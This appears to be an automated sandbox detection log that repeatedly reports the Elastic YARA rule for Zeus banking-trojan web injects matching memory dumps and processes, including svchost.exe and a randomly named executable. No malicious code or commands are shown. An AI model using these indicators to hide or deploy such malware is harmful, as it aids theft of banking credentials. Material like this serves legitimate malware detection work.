Source: 00000002.00000003.2455382191.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2486764914.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2469676261.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3272240736.0000000002915000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2510323696.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2508541619.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.3060629328.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2570365409.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2501156976.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2473316243.0000000002650000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000017.00000002.2469451874.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2478689860.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2450971544.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2510195177.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3273788686.0000000002D63000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2508233599.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2498994285.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.3060188818.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2474596414.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2477343804.0000000002DA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3272240736.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2039049974.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2535425288.00000000028C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: roundwood.exe PID: 5852, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 5284, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4268, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4672, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6980, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6300, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 6648, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 5168, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 5616, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 2672, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 3436, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 4764, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: oOzTQCDSVNrWDmuGqzFbKRbZs.exe PID: 3656, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
